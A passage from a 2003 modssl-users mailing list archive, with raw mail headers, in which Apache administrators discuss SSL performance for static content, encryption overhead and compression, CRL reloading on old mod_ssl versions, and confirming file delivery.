>
>>But, I don't want to generate absolute URLs on the fly to link to
>>non-secure static content. What I want is to make request to
>>certain urls
>>"less secure" such that processing is faster. For example, I have a
>>directory called art, which is just a defined alias for a
>>directory. Is
>>there a way to make ssl processing for this directory less
>>restrictive than
>>for the "generic requests" to the virtual host so that
>>processing is faster?
>>
>>Home someone can help
>>
>>Henrik Bentel
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
>keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss
>Exchange.
>This e-mail is of a private and personal nature. It is not related to
>the exchange or business activities of the SWX Swiss Exchange. Le
>présent e-mail est un message privé et personnel, sans rapport avec
>l'activité boursière de la SWX Swiss Exchange.
>
>This message is for the named person's use only. It may contain
>confidential, proprietary or legally privileged information. No
>confidentiality or privilege is waived or lost by any mistransmission.
>If you receive this message in error, please notify the sender urgently
>and then immediately delete the message and any copies of it from your
>system. Please also immediately destroy any hardcopies of the message.
>You must not, directly or indirectly, use, disclose, distribute, print,
>or copy any part of this message if you are not the intended recipient.
>The sender's company reserves the right to monitor all e-mail
>communications through their networks. Any views expressed in this
>message are those of the individual sender, except where the message
>states otherwise and the sender is authorised to state them to be the
>views of the sender's company.
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und persönliche Kommunikation. Sie hat keinen
Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange. This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Swiss Exchange. Le présent e-mail
est un message privé et personnel, sans rapport avec l'activité boursière de
la SWX Swiss Exchange.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 16:27:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 847AFA8963; Tue, 19 Aug 2003 16:27:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sccrmhc13.comcast.net (sccrmhc13.comcast.net [204.127.202.64])
	by master.modssl.org (Postfix) with ESMTP id 1641AA8933
	for ; Tue, 19 Aug 2003 16:27:00 +0200 (CEST)
Received: from minime.comcast.net (12-207-73-34.client.attbi.com[12.207.73.34](untrusted sender))
          by comcast.net (sccrmhc13) with SMTP
          id <200308191426580160087nt1e>
          (Authid: hbentel);
          Tue, 19 Aug 2003 14:26:58 +0000
Message-Id: <5.2.1.1.0.20030820091649.00aa9770@mail.comcast.net>
X-Sender: hbentel@mail.comcast.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Wed, 20 Aug 2003 09:26:53 -0500
To: modssl-users@modssl.org
From: Henrik Bentel 
Subject: Re: configuration question
In-Reply-To: 
References: <5.2.1.1.0.20030820005840.00a959d8@pop.earthlink.net>
 <5.2.1.1.0.20030820005840.00a959d8@pop.earthlink.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henrik Bentel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

At 02:22 AM 8/19/2003 -0400, you wrote:
>On Wed, 20 Aug 2003, Henrik Bentel wrote:
>
> > Now, all my ssl configuration is under my secure virtual host, such that it
> > applies to everything. However, I have quite a bit static content(images,
> > css, javascript.,...) which doesn't need to be very secure. I somewhat only
> > want to secure my dynamic content.
>
>If I understand your question correctly, what you're wanting is to have
>some web page that's served up with https, but to have the images on that
>page be served by regular http.  You could do that, but every browser I
>know of will throw a security warning in that case.  You can't mix secure
>and non-secure content in the same document.
>
>Does that answer your question?

Hi

not quite.
I still want everything under https, but I was wondering if there is a way 
to speed up processing per directory directive but still use https, such as 
my image -directory.
Currently I have everything for ssl configured  in the virtual host and 
server config. SSL configuration included below.
Certificate is self signed from 1024 bit RSA key.


Listen 443
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl
SSLPassPhraseDialog builtin
SSLSessionCache dbm:/var/opt/apache/run/ssl_scache
SSLSessionCacheTimeout 300
SSLMutex sem
#SSLMutex file:/var/opt/apache/run/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
ErrorLog /var/log/httpd/secure_error_log
CustomLog /var/log/httpd/secure_access_log common
LogLevel warn


ServerName 192.168.1.1
DocumentRoot "/opt/mydocRoot"
ErrorLog /var/log/httpd/secure_error_log
TransferLog /var/log/httpd/secure_access_log
LogLevel warn

SSLEngine on
SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /opt/app/conf/mycert.crt
SSLCertificateKeyFile /opt/app/conf/mycert.key
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
#CustomLog /var/log/httpd/ssl_request_log "%t %h %{SSL_PROTOCOL}x 
%{SSL_CIPHER}x \"%r\" %b"




-Henrik Bentel

>--Cliff
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 16:48:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01E63A8963; Tue, 19 Aug 2003 16:48:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 09C9BA8933
	for ; Tue, 19 Aug 2003 16:48:56 +0200 (CEST)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id 6F6EFABBE; Tue, 19 Aug 2003 07:55:50 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: configuration question
References: 
From: Eric Rescorla 
Date: 19 Aug 2003 07:55:50 -0700
In-Reply-To: 
Message-ID: 
Lines: 47
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Portable Code)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"Boyle Owen"  writes:

> >-----Original Message-----
> >From: Arthur Chan [mailto:achana@saysit.com.hk]
> >
> >Hi Boyle,
> >I've been debating with myself over whether to encrypt 
> >everything, that's a
> >cogent argument you have offered. I have a few questions myself :
> >(1) assuming an openssl encrypted packet is bigger than a 
> >plain text one,
> 
> Why would you assume this? Essentially;
> 
> 	encrypted_text = f(plain_text, key)
> 
> where f() is a mathematical function. I guess the 2nd law of
> thermodynamics ("entropy increases") would tend to cause the output
> to increase but not necessarily by much. In the simple case of a
> substitutional cipher, the encrypted text would be precisely the
> same size as the plain text.
SSL-enciphered data is always somewhat larger than the plaintext.
The overhead is from three sources:

(1) the record header (5 bytes)
(2) the MAC (16-20 bytes)
(3) block cipher padding (if applicable).

Note that all of this overhead is roughly fixed with respect to
the record size (block cipher padding depends on the record
size mod the block size). So, small records have enormous
amounts of overhead (as high as 20 or more times for single-byte
records). For large records the overhead is largely irrelevant.
(e.g. 20/15000) If you're doing bulk data transfer you should
always use large records.

> >would mod_gzip shrink it significantly to warrant the effort?
>  Zipping algorithms work by replacing repetitive sequences in the
> input with shorter instructions to regenerate them (e.g. 1000 blue
> pixels -> "1 blue pixel x 1000"). Compression works best with highly
> structured input data (bitmaps, WAV files, human language etc). With
> random data, it can't make much difference and will even cause the
> file to grow! (try repeatedly zipping a file to see this happening).
One would apply mod_gzip PRIOR to encryption, so it will work
unless the data is already pre-compressed (e.g. a GIF or a JPG).

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 16:50:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 92AA7A8974; Tue, 19 Aug 2003 16:50:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 334AEA8963
	for ; Tue, 19 Aug 2003 16:50:33 +0200 (CEST)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id A297DABBE; Tue, 19 Aug 2003 07:57:29 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: configuration question
References: 
From: Eric Rescorla 
Date: 19 Aug 2003 07:57:29 -0700
In-Reply-To: 
Message-ID: 
Lines: 36
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Portable Code)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"Dave Paris"  writes:
> In addition to Owen's salient points about compression working efficiently
> on repetitive strings in plaintext/binary data (e.g. whitespace in a Word
> document) and not on random data (e.g. encrypted data), some encryption
> algorithms can actually be weakened by compressing the resulting data,
> giving a cryptanalyzer clues to the inner workings of the algorithm.
No reasonable encryption algorithm will be weakened this way.

> As for SSL packets being larger - they're not to any appreciable degree -
> for the exact reason Owen pointed out below.  Even symmetric cipher
> algorithms don't produce appreciably larger amounts of data.  For example,
> using Chained Block Cipher (CBC) mode will only increase the amount of data
> by 8 bytes from adding an Initialization Vector (IV) to the beginning of the
> ciphertext and padding the end of the ciphertext to get a complete final
> block (with an 8 byte block cipher like Blowfish, the largest amount of
> padding will only be 7 bytes).  So, at most, you've added 15 bytes to even
> the largest amount of plaintext data using Blowfish in CBC mode.  There are
> a few exotic exceptions here, like interleaved chaining block ciphers which
> will add an IV (of the same size as above) per parallel operation (so if
> you've got four parallel encryption operations using interleaved CBC, you're
> adding 24 bytes at the beginning of the ciphertext).  However, these are
> exceptionally rare and typically limited to proprietary
> implementations/applications.
You're forgetting the MAC.

> Addressing one other misconception here.. a packet can contain up to 1500
> bytes - including headers (assuming your network handles MTUs of 1500, some
> are less (like ATM @ 53 bytes [48 bytes of payload w/5 bytes of header),
> some are more (like Frame Relay @ up to 4500 bytes), but hey, not many
> desktops are connected with ATM or Frame, so we'll call the connection
> standard ethernet with a MTU of 1500. 
The PMTU is largely irrelevant here since SSL records can be
much larger than the MTU. What's relevant here is the size
of the SSL stream vis a vis the plaintext stream.

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 19:56:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E152EA8963; Tue, 19 Aug 2003 19:56:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailhub.Dartmouth.EDU (mailhub.Dartmouth.EDU [129.170.16.6])
	by master.modssl.org (Postfix) with ESMTP id 2BBFEA8933
	for ; Tue, 19 Aug 2003 19:56:17 +0200 (CEST)
Received: from dartmouth.edu ([129.170.19.226])
	by mailhub.Dartmouth.EDU (8.9.3+DND/8.9.3) with ESMTP id NAA28405
	for ; Tue, 19 Aug 2003 13:56:15 -0400 (EDT)
Date: Tue, 19 Aug 2003 13:56:13 -0400
Mime-Version: 1.0 (Apple Message framework v552)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: CRL updating with mod_ssl
From: Roberto Hoyle 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: <6C685FA5-D26E-11D7-AE6D-000393C44676@dartmouth.edu>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Roberto Hoyle 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm trying to understand when a CRL list gets read by Apache.  I have 
cases of it being read when a new CRL is placed in the directory and 
the "make" is run, and cases when it does not get read under identical 
circumstances.

The only reliable way that I have to make sure that the CRL gets 
updated is by restarting the server.

Is this supposed to be the case?  I'm confused that it works sometimes 
and doesn't work on others.

Right now, I'm running 1.3.19 with mod_ssl 2.8.1 (yes, I know that they 
are old, but I am not able to update them for support reasons...).  We 
have the SSLCARevocationPath directive set to the proper location, and 
a script that downloads a new CRL every evening and runs the make.  The 
script does not kick the server.  Our CRLs expire in seven days, but 
get published every evening.

Should I just stop worrying and learn to love restarting Apache?

Thanks,

r.
--
Roberto Hoyle
PKI Lab Programmer
Dartmouth College

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 20:06:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 42846A8966; Tue, 19 Aug 2003 20:06:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-nj03.iplex.ssmb.com (mail2.ssmb.com [199.67.141.25])
	by master.modssl.org (Postfix) with ESMTP id C6F8EA8940
	for ; Tue, 19 Aug 2003 20:06:48 +0200 (CEST)
Received: from imbarc-nj01.nj.ssmb.com (imbarc-nj01-2 [150.110.115.169])
	by imbaspam-nj03.iplex.ssmb.com (8.12.10.Beta2/8.12.10.Beta2/SSMB_EXT/evision: 1.26 $) with ESMTP id h7JI6ksO029794
	for ; Tue, 19 Aug 2003 14:06:47 -0400 (EDT)
Received: from mailhub-nj02-1.nj.ssmb.com (mailhub-nj02-1.nj.ssmb.com [150.110.117.91])
	by imbarc-nj01.nj.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h7JI6jVS008263
	for ; Tue, 19 Aug 2003 14:06:45 -0400 (EDT)
Received: from exnjims01.nj.ssmb.com (EXNJIMS01.nj.ssmb.com [150.110.235.50])
	by mailhub-nj02-1.nj.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id OAA18653
	for ; Tue, 19 Aug 2003 14:06:45 -0400 (EDT)
Received: by EXNJIMS01.nj.ssmb.com with Internet Mail Service (5.5.2655.55)
	id ; Tue, 19 Aug 2003 14:06:45 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FE6B@EXCHNY43>
From: "Nauman, Ahmed [IT]" 
To: "'modssl-users@modssl.org'" 
Subject: File Acknowledgement
Date: Tue, 19 Aug 2003 14:06:43 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

How can we know at server side in apache that a GET or PUT request has been
received and it was failed or successfull ? Can we get somehow the response
code so that some script and/or tool at Server side can delete/archive the
file which have been retrieved by the client in some specific folders?. Is
there any industry standard for such file acknowledgement.


Regards,
Nauman
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 19 20:09:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B5722A8963; Tue, 19 Aug 2003 20:09:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 9F2C7A8933
	for ; Tue, 19 Aug 2003 20:09:32 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id 080BE156141
	for ; Tue, 19 Aug 2003 14:09:31 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id F3D9B4579E
	for ; Tue, 19 Aug 2003 14:07:27 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: CRL updating with mod_ssl
Date: Tue, 19 Aug 2003 14:07:30 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <6C685FA5-D26E-11D7-AE6D-000393C44676@dartmouth.edu>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Your actual message issue notwithstanding, the versions you're running are
not just old, they've got security flaws and vulnerabilities well documented
at both CERT, apache.org, and openssl.org.

http://www.cert.org/advisories/CA-2002-27.html  (Linux, Apache, OpenSSL,
mod_ssl)
http://www.cert.org/advisories/CA-2002-23.html  (OpenSSL)
http://www.cert.org/advisories/CA-2002-17.html  (Apache)


If you've got support preventing *you* from upgrading, *DEMAND* they be
updated to reduce your security risks, vulnerability, and liability.  If
your support contract won't do that, you don't have support and you should
upgrade to current anyway.

Respectfully,
-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Roberto Hoyle
Sent: Tuesday, August 19, 2003 1:56 PM
To: modssl-users@modssl.org
Subject: CRL updating with mod_ssl


I'm trying to understand when a CRL list gets read by Apache.  I have
cases of it being read when a new CRL is placed in the directory and
the "make" is run, and cases when it does not get read under identical
circumstances.

The only reliable way that I have to make sure that the CRL gets
updated is by restarting the server.

Is this supposed to be the case?  I'm confused that it works sometimes
and doesn't work on others.

Right now, I'm running 1.3.19 with mod_ssl 2.8.1 (yes, I know that they
are old, but I am not able to update them for support reasons...).  We
have the SSLCARevocationPath directive set to the proper location, and
a script that downloads a new CRL every evening and runs the make.  The
script does not kick the server.  Our CRLs expire in seven days, but
get published every evening.

Should I just stop worrying and learn to love restarting Apache?

Thanks,

r.
--
Roberto Hoyle
PKI Lab Programmer
Dartmouth College

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 04:11:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44591A8946; Wed, 20 Aug 2003 04:11:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (mail.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id DE7F5A8935
	for ; Wed, 20 Aug 2003 04:11:01 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.9/8.12.8/UVACS-2003031900) with ESMTP id h7K2AuvX017868;
	Tue, 19 Aug 2003 22:10:56 -0400 (EDT)
Date: Tue, 19 Aug 2003 22:10:56 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: "Nauman, Ahmed [IT]" 
Cc: "'modssl-users@modssl.org'" 
Subject: Re: File Acknowledgement
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FE6B@EXCHNY43>
Message-ID: 
References: <9F1AE1497901D71185A20002A56B9B2601B0FE6B@EXCHNY43>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 19 Aug 2003, Nauman, Ahmed [IT] wrote:

> How can we know at server side in apache that a GET or PUT request has
> been received and it was failed or successfull ? Can we get somehow the
> response code so that some script and/or tool at Server side can
> delete/archive the file which have been retrieved by the client in some
> specific folders?. Is there any industry standard for such file
> acknowledgement.

If it were me, I'd just write a CGI script to do this... as for how you
know for certain that the client received the entire response, that's a
bit tricky.  The http response code (even if it's 200 OK) doesn't tell you
what happened on the client end.  The client never sends an
acknowledgement response code.  Apache internally knows whether it
finished sending or not, but it's hard to get at that information except
by directly accessing the internal structures from a module.  Perhaps the
easiest way is to have the client request some other URL after it gets the
full document (javascript redirect?), and have that second URL be your
acknowledgement and trigger to delete the file.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 04:13:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 933F2A8967; Wed, 20 Aug 2003 04:13:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 61B4BA8935
	for ; Wed, 20 Aug 2003 04:13:35 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.9/8.12.8/UVACS-2003031900) with ESMTP id h7K2DVvX018407
	for ; Tue, 19 Aug 2003 22:13:31 -0400 (EDT)
Date: Tue, 19 Aug 2003 22:13:31 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: modssl-users@modssl.org
Subject: Re: configuration question
In-Reply-To: 
Message-ID: 
References: 
 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 19 Aug 2003, Eric Rescorla wrote:

> "Dave Paris"  writes:
> > In addition to Owen's salient points about compression working efficiently
> > on repetitive strings in plaintext/binary data (e.g. whitespace in a Word
> > document) and not on random data (e.g. encrypted data), some encryption
> > algorithms can actually be weakened by compressing the resulting data,
> > giving a cryptanalyzer clues to the inner workings of the algorithm.
>
> No reasonable encryption algorithm will be weakened this way.

I agree.  I'm guessing what he meant is that some encryption algorithms
are weakened if their /input/ is pre-compressed by some known algorithm.
If the cleartext is in some known format, it might possibly be easier to
recover it from the ciphertext.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 20 06:43:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4720BA8946; Wed, 20 Aug 2003 06:43:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 4A3BEA8935
	for ; Wed, 20 Aug 2003 06:43:04 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7K4h1Q6017747 for ; Wed, 20 Aug 2003 12:43:02 +0800 (CST)
Message-ID: <000e01c366d4$1b3d2dc0$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: 
Subject: Re: configuration question
Date: Wed, 20 Aug 2003 12:32:45 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well, my eyes did glaze over somewhere betw thermodynamics and mobile
perpetuum ;-)
So does this mean that if I work in a less sophisticated infrastructure
where only 56kbps ppp dialup is available, I can get some incremental gain
by zipping it up before encrypting it ? [yes/no]
Caveats ?
And here is where I really get it, with this next question :
I've got all this openssl key stuff working, and signed my own cert using
openssl.
On starting Netscape6.2 I got the little lock to close. I got Netscape to
register my own site as a trusted site in "WebSites"
But I want Netscape to load my certificate as an "Authority" for our testing
purposes.
How does one go about doing that, both in Netscape and MSIE5 ?
TIA :-)


----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Tuesday, August 19, 2003 07:58 PM
Subject: RE: configuration question


> In addition to Owen's salient points about compression working efficiently
> on repetitive strings in plaintext/binary data (e.g. whitespace in a Word
> document) and not on random data (e.g. encrypted data), some encryption
> algorithms can actually be weakened by compressing the resulting data,
> giving a cryptanalyzer clues to the inner workings of the algorithm.
>
> The bottom line here is that SSL works on the socket/transport layer and
not
> at the application layer.  If you're generating a .gz file on-the-fly
within
> Apache (mod_gzip, etc), the result will still be encrypted *after*
> compression.  The output chain of Apache applies SSL as the last stage, so
> something like mod_gzip will operate *before* SSL.  Most modern browsers
> produced in the last four or five years will decompress a .gz file (not
> .zip!) for the user - even on Windows (just tested IE6 on XP .. works
fine).
> If you've ever experimented with VRML, one "best practices" is to send
files
> as .wrl.gz and not straight .wrl.
>
> As for SSL packets being larger - they're not to any appreciable degree -
> for the exact reason Owen pointed out below.  Even symmetric cipher
> algorithms don't produce appreciably larger amounts of data.  For example,
> using Chained Block Cipher (CBC) mode will only increase the amount of
data
> by 8 bytes from adding an Initialization Vector (IV) to the beginning of
the
> ciphertext and padding the end of the ciphertext to get a complete final
> block (with an 8 byte block cipher like Blowfish, the largest amount of
> padding will only be 7 bytes).  So, at most, you've added 15 bytes to even
> the largest amount of plaintext data using Blowfish in CBC mode.  There
are
> a few exotic exceptions here, like interleaved chaining block ciphers
which
> will add an IV (of the same size as above) per parallel operation (so if
> you've got four parallel encryption operations using interleaved CBC,
you're
> adding 24 bytes at the beginning of the ciphertext).  However, these are
> exceptionally rare and typically limited to proprietary
> implementations/applications.
>
> Addressing one other misconception here.. a packet can contain up to 1500
> bytes - including headers (assuming your network handles MTUs of 1500,
some
> are less (like ATM @ 53 bytes [48 bytes of payload w/5 bytes of header),
> some are more (like Frame Relay @ up to 4500 bytes), but hey, not many
> desktops are connected with ATM or Frame, so we'll call the connection
> standard ethernet with a MTU of 1500.  The way networks operate and
packets
> are forwarded, smaller packets actually transmit *less* data for any given
> amount of time over larger packets.  Switches and routers (OSI layer 2 and
3
> devices) operate on packet forwarding rates, regardless of the amount of
> data in the packet.  The more data in the packet, the more data you're
going
> to get for X period of time - this is one factor that introduces latency
> into a network.  Lots of small packets going through a network simply
> transmit less data than lots of large packets .. and since the only
> appreciable metric is the number of packets and the packet forwarding rate
> of the network device, the larger the packet, the happier the network and
> the more data getting to the end user.  The *only* place this is going to
> make a difference is if you've got an -inline- intrusion
> detection/prevension system (IDS/IPS), in which case you've got what most
> network engineers would consider to be a design flaw anyway.  In this
case,
> each packet needs to be inspected and the more data there is, the more
there
> is to be inspected.  Most IDS sensors will simply discard packets being
> inspected rather than slow the network down (Snort does this when it's
> either misconfigured or overloaded).
>
> So.. go for it.  Use mod_gzip (or similar) to generate .gz docs on the fly
> .. let Apache handle your SSL.  If anything, your win comes from SSL
having
> to encrypt *less* data.  This won't speed up the handshake phase, but will
